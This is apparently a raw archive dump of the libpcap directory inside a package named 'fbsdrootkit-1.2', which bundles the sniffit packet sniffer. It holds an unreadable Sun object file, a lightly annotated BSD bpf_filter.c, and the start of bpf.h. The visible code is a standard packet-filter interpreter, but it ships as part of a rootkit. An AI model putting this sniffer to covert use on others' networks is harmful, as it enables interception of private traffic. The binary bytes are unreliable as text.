¶?ÿ€^Ö(4Ѐ"€€Y¶?ÿ¶`ÿ²àú@€"€!’ à`€¦À6€ â`’ @ ¸€2€è ¦ ¶?ÿ€Dæ(4Ѐ¦À4€²¤ ¶?ÿ€=ä(4Ðú@€"€’ à`€¦À6¿ÿóâ`’ @ ¸€"¿ÿé¦ è ’ ¨ è' ú  ø'`ì@ì'@ú&@ð'`ú& ú& 8À'`À'`ö'`À'`@À'` ²€€î`´ ô-à ú` . 
0Ð7@’c€Ò7`  ”¢àÔ7` Ö`’–àÖ&` Â@Â@ŸÀ@Ð Çà‘èã¿  $@’ ö úà Ðà€Š "€ €"€’ @¸`ú€"€ €€§@"€€¸ú€2¿ÿû€§@€2€ÔÀ@ ÔÀÔ'À& @ÐàÇà‘è ã¿ Ò`Ò ` € €H€¢`€!€¢`€€¢`†€BÐ` Ð €Š "€ Ú` ’ @ú` Ö@– àý– àÿÖ/@Ú` Ú @€‹`€0’@€.’@-€)ú` Ð`¶`€€!ä ä   €€ê@€€@û¸€2€îà @€”î6à Ð ’Ð Â 0ŸÀ@@€@Çà‘è ã¿ ú ö`  øÀ’`€§ €0’a €§ 2€ Ð` €2€  Ò`” ‚Ô*` – 9Ö&à’@€!’`€§ €F ’`€§ €‚ ’`€§ €+0’`€§ €o0’`€§ €²0’a €§ "€ ú` Ø`š ‚Ú+ ’@² Çà‘èÔ`Ô  Â`4ŸÀ@’Ð&àÞà€"€ä`à`¢ ‚¿ÿíâ, ¦ æ,  ¨ ¿ÿèè&à Ð`’ @Ð ¸€2€ø'` î` ‚Ð-à ’ ¿ÿÚÒ&àÔ`– Ö*  ¿ÿÕÀ&à ô`¸ ô  ô€€Ž "€è`àà€"€â`€ ¸ €Œ`2€€Ð` @’ ¸€"€î`ä`¦ ‚æ,  ¿ÿ¹ø&à€ "€ î`Ð` @’ €"€î`ê`¬ ‚ì-` ¿ÿ«Ð&à´ ® ÿðî'`Ô`𠔀Ô'`Ø`Ú+ ¿ÿ À&à Þ`¨ Þà ú`ª º`ú#Àæ`è,à ¿ÿ•ê&à ì`ì  ì€ì'`Ò`€ "€ Ø`Ô`€¢ :€Ø`– Ö'`Ø`š Ú+ À&à ’ @ ¶€"¿ÿ}’Þ`€"€º%Üú`€§`d4€€§a€¸ 4€¸ ¸ âठä,` ôà ¦ 0æ6€’@‘/`Ð6  ‘/`@’Ð6  èਠè&à@’¿ÿZ’ì`” ì  ú`– ú%€Ò`Ô*` ¿ÿOÖ&à ã¿ ø €"€€Ò €¢@2€øÔ  € €Ö €Šà"€ ø@Ð €2€ €Ø ˜ Ø' ø€2¿ÿëÒ €€ è ’”@®€"€ Þ €"€”º €"€‘º €úžà€ŒÞ' €¤@2€ú@ä  €€æ`€Œà"€ ú@@Ð`€2€ €Ð` Ð'`ú@€2¿ÿëâ` €"€à Ô`€¢€2€ Ô`@ª€2€à Ö`–à€ Ö'`’@cª€2€è`Ú`š`Ú'`à €Œ "€J ⠶ €Œ`"€ä ¶ ä €Œ "€æ ¶àæ €Œà"€’ ¶à’ @¶€2€Ôà@Ð  €4Ð' – Ö*  Ø €‹ "€ Ð ìàžààÀÞàà% Þ% äठä&àÐ €Š "€ Ø ìàÒ Ò%€Ôà” Ô&àØ €‹ "€ ’ìàÚ Þ š@Ú%€âà¢`â&à’@®Â ’Â` Â@Â@Ð ŸÀ@Ð ¸€¿ÿq®º Çà‘èã¿ ú €"€ø ´& €§@(€ø ºø ’ ¸@¸ ¹7 ¹/ @´€2€ê €´ À-` ì ì ¬%€ì& ì&  ÐÒ @Ô ð Ô €”€€ Ô& Ö ”’ @Ø ˜Ø& Çà‘èã¿ @Çà‘è 㿘€¸¿ü€À'¿üÖ Ò Ô –"À  ’@˜ º€2€ ú'Ô¿ü€ €@пü@€° 𠸀2¿ÿçÖ ð¿üÇàè@(#)nit_if.c 1.24 88/02/09 Copyr 1987 Sun Micro껀.àsnitsnit_close nonexistent instance ˆ ‹| ˆŒ ‹´†ÿÿÿL†ÿÿþäx†ÿÿþˆô&†ÿÿþ  ˆ ˆ$†ÿÿýÜ, ˆ0 ‹p …t%†ÿÿýŒx …ˆ†ÿÿýxà&†ÿÿý 6†ÿÿüðˆ†ÿÿüx¸†ÿÿüHÈ5†ÿÿü846†ÿÿûÌ´6†ÿÿûL *†ÿÿúਆÿÿúXä†ÿÿú°†ÿÿùP9†ÿÿøè(9†ÿÿøØD6†ÿÿø¼€ ˆ„ ‹Ä †ÿÿø<| †ÿÿ÷„È#†ÿÿ÷8 l†ÿÿö” „5†ÿÿö| ¸ˆ ¼‹ 8†ÿÿõÈ À†ÿÿõ@ †ÿÿõ ,†ÿÿôÔ L†ÿÿô´ € H „ H Œ †ÿÿôt ´ †ÿÿôL ¼5†ÿÿôD4 €HLìT \˜p x 0| L ì" €.Ø: F LR 0^hqzƒŒ€•Ÿ@©°¶¿ÆÐ×Ýãíõü˜ #.6=AI \\ck H~@Š”œ§° ¹Ä hÏ|ÚÞæîòû 
ð$_phz_hostnamelen_snit_close_snit_cpmsg_snit_ioctl_snit_minfo_snit_winit_snit_rinit_boottime_mclfree_m_freem_mclgetx_nisoftc_pidhash_freeproc_hostname_bcopy_proc_whichqs_freeb_m_cpytoc_ifnet_time_tick_rawintrq_allocb_linkb_lbolt_snit_put_domainnamelen_mfree_ifpromisc_canput_nproc_hz_dupmsg_cp_mblks_to_mbufs_panic_flushq_free_mbuffed_mblk_domainname_zombproc_ifunit_procNPROC_allproc_avenrun_snit_open_snit_info_snit_intr_qs_m_want_mbstat_tz_freemsg_qreply_etherbroadcastaddr_sccsid.mulfbsdrootkit-1.2/sniffit.0.3.3/libpcap/SUNOS4/nit_if.o.sun3100600 764 764 10253 6226213210 20174 0ustar dfdf €¸¬H@NVÿìH×<€ ®f.~(|` ¾­m R‡(M*TJfð ‡fFüšxpÿ`ìJ®gpÿ`à~.(|`¾­m¾­n üšxpÿ`º(M*TJfàHxHx N¹PO&@J‹f ü šxpÿ`r Ó«*k +K*”(+n n!M n!M8B­B­+GB­B­ HxHxN¹PO&@J€g: k| $k 4¼05|»€ 5|.à rÓ«HS n/( h P PNPO Lî<€ÿìN^NuNVÿìH×<*nHxHm$N¹PO(m$l ,gJŠg B§HRN¹PO-|ÿü`·Ìg-Kÿü nÿü&PJ‹fîJ‹fHy N¹XO nÿü ”B­/,N¹XOpLî<ÿìN^NuNVÿì n hp( J€g r°grr°gX €†fö n h gHx/.N¹PO n h ý n h g¼/. /.N¹PO`´/. /.N¹öPO`  n -h ÿü-hÿø .ÿüT€-@ÿìJ®ÿøgr nÿø hJ( fd nÿüJPf\/.ÿøN¹ XO-@ÿôf /. N¹`H nÿì1h n h-h ÿð/.ÿü/.ÿô/.ÿð nÿð h.NOï /. N¹` /. N¹XOpN^NuNVÿÜH×<À n*h n (h .  €€pg €À i f–J­ fŽ n h|‚ ~9)G/. /.N¹PO`Â&m n h$h HR/HS k2NOï )@J¬fv n h| ~ )G `l n h$h HxHRN¹PO&@J‹f n h|‚ ~)G`4+K n h| B¬ ` n h h -Pÿü| .ÿÿg@Jlg|` -fHx/- N¹PO,J†g2 n h|‚ )F` -gB§/- N¹PO,fÎ~ðÏ­.ÿÿ~À‡­ n h| B¬ `~ n h h -~À‡ € n h| ~)G `P n h h +PJ­g ­d~+G n h| B¬ HxHxN¹PO-@ÿügJ­g -` <Ü-@ÿø ®dÿønp` ®ÿønp`p-@ÿô nÿü h| nÿü&h 6¼0 .ÿøë€L.ÿô7@ .ÿøç€L.ÿô7@ nÿü~ߨ/.ÿü/.N¹PO`p n h h ­ n h| ~)G `J  €€pgþ( €€pgþè €€ pgý €Àpgþ¦ €Àpg¨ €À i gýb n h|‚ /. /.N¹POpLî<ÀÿÜN^NuNVÿàH×<ÀB®ÿü&y`4 + °®f( nJ¨ g +~À‡g/+N¹XOJ€f R«&SJ‹fÈJ‹gÐ.+//. /.N¹HOï *@Jf¨R«`¨Jg $S`4 * °®f( nJ¨ g *g/*N¹XOJ€f Rª$RJŠfÈJŠgB¾ªfHUN¹XO(@JŒf,Rª`&/*/. 
/.N¹HOï (@JŒfRª`.* +|À†gî| +gP† +gX† +gX†Hx/N¹PO-@ÿüfHUN¹XOR«`¼ nÿü h| +g$ nÿü-hÿøAù"nÿø#h" nÿüP¨ +g nÿü-hÿø nÿø « nÿüX¨ +g$ nÿü-hÿø n (Ш nÿø € nÿüX¨HU/.ÿüN¹PO*nÿüHU k/( k h P PNPO&J*LJ‹fþ^pLî<ÀÿàN^NuNVÿìH×0à*n..,-J‡g z…¼€cž…,*Ú­V…äåHx/N¹PO(@J€fp`R lB( l (…)@)@ /-/,/N¹Oï -ѬJ†o/,/B§/. N¹Ý¬ Lî0àÿìN^NuNV/.N¹XOpN^NuNVÿðH×8B®ÿüIîÿü&n`NB§ +« //+ / HzÿÀN¹Oï*@Jf J®ÿüg /.ÿüN¹XOHSN¹XOp`((M&kJ‹f® .ÿüLî8ÿðN^Nu@(#)nit_if.c 1.24 88/02/09 Copyr 1987 Sun Micro 0껀.à4 ° ° ¾ Úsnit_close nonexistent instancesnitPTP„$Pâ$PJ,Pl8PtP”@š.P°7P,P4PH@Ž@ 7PÞ7Pê#PJP¬P 8PT8Pö$PŠP P,PVP€@ÆPè"P@Z$Pj#Pœ-P5P‚$P¸PÚ6Pø7P 2P L%P V#P2@F@J@R@Z@n@v@z@  €&* Ú6=F O^kHw@‹— ª³4¿Ó öÞ °êòú î#.€7>F@RYajr{ö‹ ¾— ª°¸¾ÅÂÏÖßéñü _cp_mblks_to_mbufs_sccsid_lbolt_qs_snit_winit_nproc_whichqs_avenrun_domainnamelen_hostnamelen_snit_cpmsg_rawintrq_hostname_tz_canput_nisoftc_boottime_mclgetx_snit_close_etherbroadcastaddr_snit_info_snit_minfo_m_want_ifunit_tick_procNPROC_phz_free_mbuffed_mblk_snit_open_pidhash_bcopy_qreply_domainname_mfree_dupmsg_freemsg_allocb_m_freem_hz_snit_ioctl_snit_rinit_mclfree_freeproc_proc_flushq_time_panic_snit_put_ifnet_allproc_zombproc_mbstat_snit_intr_linkb_m_cpytoc_freeb_ifpromiscfbsdrootkit-1.2/sniffit.0.3.3/libpcap/VERSION100600 764 764 6 6226213210 15625 0ustar dfdf0.0.6 fbsdrootkit-1.2/sniffit.0.3.3/libpcap/bpf/ 40700 764 764 0 6226213210 15311 5ustar dfdffbsdrootkit-1.2/sniffit.0.3.3/libpcap/bpf/net/ 40700 764 764 0 6226213210 16077 5ustar dfdffbsdrootkit-1.2/sniffit.0.3.3/libpcap/bpf/net/bpf_filter.c100400 764 764 25354 6226213210 20505 0ustar dfdf/*- * Copyright (c) 1990, 1991, 1992, 1993 * The Regents of the University of California. All rights reserved. * * This code is derived from the Stanford/CMU enet packet filter, * (net/enet.c) distributed as part of 4.3BSD, and code contributed * to Berkeley by Steven McCanne and Van Jacobson both of Lawrence * Berkeley Laboratory. 
* * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. All advertising materials mentioning features or use of this software * must display the following acknowledgement: * This product includes software developed by the University of * California, Berkeley and its contributors. * 4. Neither the name of the University nor the names of its contributors * may be used to endorse or promote products derived from this software * without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. 
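* * @(#)bpf.c 7.5 (Berkeley) 7/15/91 * * static char rcsid[] = * "$Header: bpf_filter.c,v 1.22 94/06/05 20:12:39 leres Exp $"; */
#if !(defined(lint) || defined(KERNEL))
static char rcsid[] =
    "@(#) $Header: bpf_filter.c,v 1.22 94/06/05 20:12:39 leres Exp $ (LBL)";
#endif

/*
 * NOTE(review): the header names after each #include were stripped when
 * this page was extracted.  The names below are inferred from the types
 * and macros this file uses (u_int, ntohl, mtod, struct bpf_insn) --
 * confirm them against the upstream file.
 */
#include <sys/param.h>
#include <sys/types.h>
#include <sys/time.h>
#include <net/bpf.h>

/*
 * NOTE(review): outside __alpha these "32-bit" names are long/u_long, so
 * they are wider than 32 bits wherever long is 64 bits.
 */
#if defined(__alpha)
typedef int int32;
typedef u_int u_int32;
#else
typedef long int32;
typedef u_long u_int32;
#endif

#ifdef sun
#include <netinet/in.h>
#endif

#if defined(sparc) || defined(mips) || defined(ibm032) || defined(__alpha)
#define BPF_ALIGN
#endif

/*
 * Big-endian 16/32-bit fetch from packet memory.  With BPF_ALIGN the value
 * is assembled byte by byte so that no unaligned access is made.
 */
#ifndef BPF_ALIGN
#define EXTRACT_SHORT(p)    ((u_short)ntohs(*(u_short *)(p)))
#define EXTRACT_LONG(p)     (ntohl(*(u_int32 *)(p)))
#else
#define EXTRACT_SHORT(p)\
    ((u_short)\
        ((u_short)*((u_char *)(p)+0)<<8|\
         (u_short)*((u_char *)(p)+1)<<0))
#define EXTRACT_LONG(p)\
        ((u_int32)*((u_char *)(p)+0)<<24|\
         (u_int32)*((u_char *)(p)+1)<<16|\
         (u_int32)*((u_char *)(p)+2)<<8|\
         (u_int32)*((u_char *)(p)+3)<<0)
#endif

#ifdef KERNEL
#include <sys/mbuf.h>

/*
 * Advance m to the mbuf that holds byte offset k and reduce k to the offset
 * inside that mbuf.  Returns 0 from the enclosing function when the chain
 * ends first.  The caller must have rejected a negative k already.
 */
#define MINDEX(m, k) \
{ \
    register int len = m->m_len; \
 \
    while (k >= len) { \
        k -= len; \
        m = m->m_next; \
        if (m == 0) \
            return 0; \
        len = m->m_len; \
    } \
}

/*
 * Fetch the big-endian word at byte offset k of the mbuf chain m.  The word
 * may straddle the mbuf holding offset k and the one that follows it.
 * On success *err is 0 and the word is returned.  *err is 1 and 0 is
 * returned when k is negative, when the chain ends before offset k, or when
 * those two mbufs together hold fewer than 4 bytes from offset k.
 */
static int
m_xword(m, k, err)
    register struct mbuf *m;
    register int k, *err;
{
    register int len;
    register u_char *cp, *np;
    register struct mbuf *m0;

    /* A negative offset would index in front of the first mbuf. */
    if (k < 0)
        goto bad;
    len = m->m_len;
    while (k >= len) {
        k -= len;
        m = m->m_next;
        if (m == 0)
            goto bad;
        len = m->m_len;
    }
    cp = mtod(m, u_char *) + k;
    if (len - k >= 4) {
        *err = 0;
        return EXTRACT_LONG(cp);
    }
    m0 = m->m_next;
    if (m0 == 0 || m0->m_len + len - k < 4)
        goto bad;
    *err = 0;
    np = mtod(m0, u_char *);
    /*
     * cp already points at offset k, so it is indexed from 0 here; indexing
     * it with k again would read k bytes further than intended.
     */
    switch (len - k) {

    case 1:
        return ((u_int32)cp[0] << 24) | ((u_int32)np[0] << 16) |
            ((u_int32)np[1] << 8) | np[2];

    case 2:
        return ((u_int32)cp[0] << 24) | ((u_int32)cp[1] << 16) |
            ((u_int32)np[0] << 8) | np[1];

    default:
        return ((u_int32)cp[0] << 24) | ((u_int32)cp[1] << 16) |
            ((u_int32)cp[2] << 8) | np[0];
    }
    bad:
    *err = 1;
    return 0;
}

/*
 * Fetch the big-endian halfword at byte offset k of the mbuf chain m; the
 * two bytes may sit in consecutive mbufs.  On success *err is 0 and the
 * value is returned.  *err is 1 and 0 is returned when k is negative, when
 * the chain ends before offset k, or when the second byte is not available.
 */
static int
m_xhalf(m, k, err)
    register struct mbuf *m;
    register int k, *err;
{
    register int len;
    register u_char *cp;
    register struct mbuf *m0;

    if (k < 0)
        goto bad;
    len = m->m_len;
    while (k >= len) {
        k -= len;
        m = m->m_next;
        if (m == 0)
            goto bad;
        len = m->m_len;
    }
    cp = mtod(m, u_char *) + k;
    if (len - k >= 2) {
        *err = 0;
        return EXTRACT_SHORT(cp);
    }
    m0 = m->m_next;
    /* The low byte comes from the next mbuf, which must hold at least one. */
    if (m0 == 0 || m0->m_len < 1)
        goto bad;
    *err = 0;
    /* cp already includes k; index it from 0. */
    return (cp[0] << 8) | mtod(m0, u_char *)[0];
    bad:
    *err = 1;
    return 0;
}
#endif

/*
 * Execute the filter program starting at pc on the packet p.
 * wirelen is the length of the original packet;
 * buflen is the amount of data present.
 *
 * Returns the value of the RET instruction that ends the run, (u_int)-1
 * when pc is null, and 0 when a load falls outside the packet, a scratch
 * memory index is out of range or a division by zero is attempted.  In a
 * KERNEL build a load that does not fit in buflen is retried through the
 * mbuf helpers, with p cast to struct mbuf *, but only when buflen is 0.
 *
 * Jump targets are not checked here: pc is advanced by whatever the
 * instruction says.  A program from an untrusted source has to be checked
 * (see bpf_validate below, built only for KERNEL) before it is run.
 */
u_int
bpf_filter(pc, p, wirelen, buflen)
    register struct bpf_insn *pc;
    register u_char *p;
    u_int wirelen;
    register u_int buflen;
{
    register u_int32 A, X;
    register int k;
    int32 mem[BPF_MEMWORDS];

    if (pc == 0)
        /*
         * No filter means accept all.
         */
        return (u_int)-1;

    /*
     * Start from a known state so that a program which reads A, X or a
     * scratch word before writing it cannot observe stale stack contents.
     */
    A = 0;
    X = 0;
    for (k = 0; k < BPF_MEMWORDS; ++k)
        mem[k] = 0;

    --pc;
    while (1) {
        ++pc;
        switch (pc->code) {

        default:
#ifdef KERNEL
            return 0;
#else
            abort();
#endif
        case BPF_RET|BPF_K:
            return (u_int)pc->k;

        case BPF_RET|BPF_A:
            return (u_int)A;

        case BPF_LD|BPF_W|BPF_ABS:
            k = pc->k;
            /*
             * The offset is signed; a negative one must not reach the
             * unsigned comparison, and the comparison is written as a
             * subtraction so that it cannot wrap.
             */
            if (k < 0)
                return 0;
            if ((u_int)k > buflen ||
                buflen - (u_int)k < sizeof(int32)) {
#ifdef KERNEL
                int merr;

                if (buflen != 0)
                    return 0;
                A = m_xword((struct mbuf *)p, k, &merr);
                if (merr != 0)
                    return 0;
                continue;
#else
                return 0;
#endif
            }
            A = EXTRACT_LONG(&p[k]);
            continue;

        case BPF_LD|BPF_H|BPF_ABS:
            k = pc->k;
            if (k < 0)
                return 0;
            if ((u_int)k > buflen ||
                buflen - (u_int)k < sizeof(short)) {
#ifdef KERNEL
                int merr;

                if (buflen != 0)
                    return 0;
                A = m_xhalf((struct mbuf *)p, k, &merr);
                /* Same failure handling as the other mbuf loads. */
                if (merr != 0)
                    return 0;
                continue;
#else
                return 0;
#endif
            }
            A = EXTRACT_SHORT(&p[k]);
            continue;

        case BPF_LD|BPF_B|BPF_ABS:
            k = pc->k;
            if (k < 0)
                return 0;
            if ((u_int)k >= buflen) {
#ifdef KERNEL
                register struct mbuf *m;

                if (buflen != 0)
                    return 0;
                m = (struct mbuf *)p;
                MINDEX(m, k);
                A = mtod(m, u_char *)[k];
                continue;
#else
                return 0;
#endif
            }
            A = p[k];
            continue;

        case BPF_LD|BPF_W|BPF_LEN:
            A = wirelen;
            continue;

        case BPF_LDX|BPF_W|BPF_LEN:
            X = wirelen;
            continue;

        case BPF_LD|BPF_W|BPF_IND:
            /* X comes from the program or the packet; treat k as hostile. */
            k = X + pc->k;
            if (k < 0)
                return 0;
            if ((u_int)k > buflen ||
                buflen - (u_int)k < sizeof(int32)) {
#ifdef KERNEL
                int merr;

                if (buflen != 0)
                    return 0;
                A = m_xword((struct mbuf *)p, k, &merr);
                if (merr != 0)
                    return 0;
                continue;
#else
                return 0;
#endif
            }
            A = EXTRACT_LONG(&p[k]);
            continue;

        case BPF_LD|BPF_H|BPF_IND:
            k = X + pc->k;
            if (k < 0)
                return 0;
            if ((u_int)k > buflen ||
                buflen - (u_int)k < sizeof(short)) {
#ifdef KERNEL
                int merr;

                if (buflen != 0)
                    return 0;
                A = m_xhalf((struct mbuf *)p, k, &merr);
                if (merr != 0)
                    return 0;
                continue;
#else
                return 0;
#endif
            }
            A = EXTRACT_SHORT(&p[k]);
            continue;

        case BPF_LD|BPF_B|BPF_IND:
            k = X + pc->k;
            if (k < 0)
                return 0;
            if ((u_int)k >= buflen) {
#ifdef KERNEL
                register struct mbuf *m;

                if (buflen != 0)
                    return 0;
                m = (struct mbuf *)p;
                MINDEX(m, k);
                /* u_char, as in the BPF_ABS case: no sign extension. */
                A = mtod(m, u_char *)[k];
                continue;
#else
                return 0;
#endif
            }
            A = p[k];
            continue;

        case BPF_LDX|BPF_MSH|BPF_B:
            k = pc->k;
            if (k < 0)
                return 0;
            if ((u_int)k >= buflen) {
#ifdef KERNEL
                register struct mbuf *m;

                if (buflen != 0)
                    return 0;
                m = (struct mbuf *)p;
                MINDEX(m, k);
                X = (mtod(m, u_char *)[k] & 0xf) << 2;
                continue;
#else
                return 0;
#endif
            }
            X = (p[k] & 0xf) << 2;
            continue;

        case BPF_LD|BPF_IMM:
            A = pc->k;
            continue;

        case BPF_LDX|BPF_IMM:
            X = pc->k;
            continue;

        /*
         * Scratch memory: the index comes straight from the program, so it
         * is range-checked on every access.
         */
        case BPF_LD|BPF_MEM:
            if (pc->k < 0 || pc->k >= BPF_MEMWORDS)
                return 0;
            A = mem[pc->k];
            continue;

        case BPF_LDX|BPF_MEM:
            if (pc->k < 0 || pc->k >= BPF_MEMWORDS)
                return 0;
            X = mem[pc->k];
            continue;

        case BPF_ST:
            if (pc->k < 0 || pc->k >= BPF_MEMWORDS)
                return 0;
            mem[pc->k] = A;
            continue;

        case BPF_STX:
            if (pc->k < 0 || pc->k >= BPF_MEMWORDS)
                return 0;
            mem[pc->k] = X;
            continue;

        case BPF_JMP|BPF_JA:
            pc += pc->k;
            continue;

        case BPF_JMP|BPF_JGT|BPF_K:
            pc += (A > pc->k) ? pc->jt : pc->jf;
            continue;

        case BPF_JMP|BPF_JGE|BPF_K:
            pc += (A >= pc->k) ? pc->jt : pc->jf;
            continue;

        case BPF_JMP|BPF_JEQ|BPF_K:
            pc += (A == pc->k) ? pc->jt : pc->jf;
            continue;

        case BPF_JMP|BPF_JSET|BPF_K:
            pc += (A & pc->k) ? pc->jt : pc->jf;
            continue;

        case BPF_JMP|BPF_JGT|BPF_X:
            pc += (A > X) ? pc->jt : pc->jf;
            continue;

        case BPF_JMP|BPF_JGE|BPF_X:
            pc += (A >= X) ? pc->jt : pc->jf;
            continue;

        case BPF_JMP|BPF_JEQ|BPF_X:
            pc += (A == X) ? pc->jt : pc->jf;
            continue;

        case BPF_JMP|BPF_JSET|BPF_X:
            pc += (A & X) ? pc->jt : pc->jf;
            continue;

        case BPF_ALU|BPF_ADD|BPF_X:
            A += X;
            continue;

        case BPF_ALU|BPF_SUB|BPF_X:
            A -= X;
            continue;

        case BPF_ALU|BPF_MUL|BPF_X:
            A *= X;
            continue;

        case BPF_ALU|BPF_DIV|BPF_X:
            if (X == 0)
                return 0;
            A /= X;
            continue;

        case BPF_ALU|BPF_AND|BPF_X:
            A &= X;
            continue;

        case BPF_ALU|BPF_OR|BPF_X:
            A |= X;
            continue;

        /* NOTE(review): shift counts are not range-checked. */
        case BPF_ALU|BPF_LSH|BPF_X:
            A <<= X;
            continue;

        case BPF_ALU|BPF_RSH|BPF_X:
            A >>= X;
            continue;

        case BPF_ALU|BPF_ADD|BPF_K:
            A += pc->k;
            continue;

        case BPF_ALU|BPF_SUB|BPF_K:
            A -= pc->k;
            continue;

        case BPF_ALU|BPF_MUL|BPF_K:
            A *= pc->k;
            continue;

        case BPF_ALU|BPF_DIV|BPF_K:
            /* Only the KERNEL validator rejects a constant zero divisor. */
            if (pc->k == 0)
                return 0;
            A /= pc->k;
            continue;

        case BPF_ALU|BPF_AND|BPF_K:
            A &= pc->k;
            continue;

        case BPF_ALU|BPF_OR|BPF_K:
            A |= pc->k;
            continue;

        case BPF_ALU|BPF_LSH|BPF_K:
            A <<= pc->k;
            continue;

        case BPF_ALU|BPF_RSH|BPF_K:
            A >>= pc->k;
            continue;

        case BPF_ALU|BPF_NEG:
            A = -A;
            continue;

        case BPF_MISC|BPF_TAX:
            X = A;
            continue;

        case BPF_MISC|BPF_TXA:
            A = X;
            continue;
        }
    }
}

#ifdef KERNEL
/*
 * Return true if the program f of len instructions is a valid filter
 * program.  The constraints are that the program is not empty, that each
 * jump is forward and lands inside the program, that every scratch-memory
 * load or store (through A or X) uses an index below BPF_MEMWORDS, that no
 * instruction divides by a constant zero, and that the last instruction is
 * a return.
 *
 * The kernel needs to be able to verify an application's filter code.
 * Otherwise, a bogus program could easily crash the system.
 */
int
bpf_validate(f, len)
    struct bpf_insn *f;
    int len;
{
    register int i;
    register struct bpf_insn *p;

    /* An empty program has no last instruction to inspect. */
    if (len < 1)
        return 0;

    for (i = 0; i < len; ++i) {
        /*
         * Check that jumps are forward, and within
         * the code block.
         */
        p = &f[i];
        if (BPF_CLASS(p->code) == BPF_JMP) {
            register int from = i + 1;

            if (BPF_OP(p->code) == BPF_JA) {
                /*
                 * k is signed: a negative value is a backward jump.
                 * Comparing against len - from avoids overflow in
                 * from + k.
                 */
                if (p->k < 0 || p->k >= len - from)
                    return 0;
            }
            else if (p->jt >= len - from || p->jf >= len - from)
                return 0;
        }
        /*
         * Check that memory operations use valid addresses.
         * Stores and loads through X count as well.
         */
        if ((BPF_CLASS(p->code) == BPF_ST ||
             BPF_CLASS(p->code) == BPF_STX ||
             ((BPF_CLASS(p->code) == BPF_LD ||
               BPF_CLASS(p->code) == BPF_LDX) &&
              BPF_MODE(p->code) == BPF_MEM)) &&
            (p->k >= BPF_MEMWORDS || p->k < 0))
            return 0;
        /*
         * Check for constant division by 0.
         */
        if (p->code == (BPF_ALU|BPF_DIV|BPF_K) && p->k == 0)
            return 0;
    }
    return BPF_CLASS(f[len - 1].code) == BPF_RET;
}
#endif
fbsdrootkit-1.2/sniffit.0.3.3/libpcap/bpf/net/bpf.h100600 764 764 17465 6226213210 17153 0ustar dfdf/*- * Copyright (c) 1990-1991 The Regents of the University of California. * All rights reserved. * * This code is derived from the Stanford/CMU enet packet filter, * (net/enet.c) distributed as part of 4.3BSD, and code contributed * to Berkeley by Steven McCanne and Van Jacobson both of Lawrence * Berkeley Laboratory. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. All advertising materials mentioning features or use of this software * must display the following acknowledgement: * This product includes software developed by the University of * California, Berkeley and its contributors. * 4. Neither the name of the University nor the names of its contributors * may be used to endorse or promote products derived from this software * without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED.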
IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. * * @(#)bpf.h 7.1 (Berkeley) 5/7/91 * * @(#) $Header: bpf.h,v 1.28 93/12/11 00:49:46 mccanne Locked $ (LBL) */ #ifndef BPF_MAJOR_VERSION /* BSD style release date */ #define BPF_RELEASE 199406 #if defined(__alpha) typedef int bpf_int32; typedef u_int bpf_u_int32; #else typedef long bpf_int32; typedef u_long bpf_u_int32; #endif /* * Alignment macros. BPF_WORDALIGN rounds up to the next * even multiple of BPF_ALIGNMENT. */ #define BPF_ALIGNMENT sizeof(long) #define BPF_WORDALIGN(x) (((x)+(BPF_ALIGNMENT-1))&~(BPF_ALIGNMENT-1)) #define BPF_MAXINSNS 512 #define BPF_MAXBUFSIZE 0x8000 #define BPF_MINBUFSIZE 32 /* * Structure for BIOCSETF. */ struct bpf_program { u_int bf_len; struct bpf_insn *bf_insns; }; /* * Struct returned by BIOCGSTATS. */ struct bpf_stat { u_int bs_recv; /* number of packets received */ u_int bs_drop; /* number of packets dropped */ }; /* * Struct return by BIOCVERSION. This represents the version number of * the filter language described by the instruction encodings below. * bpf understands a program iff kernel_major == filter_major && * kernel_minor >= filter_minor, that is, if the value returned by the * running kernel has the same major number and a minor number equal * equal to or less than the filter being downloaded. Otherwise, the * results are undefined, meaning an error may be returned or packets * may be accepted haphazardly. * It has nothing to do with the source code version. 
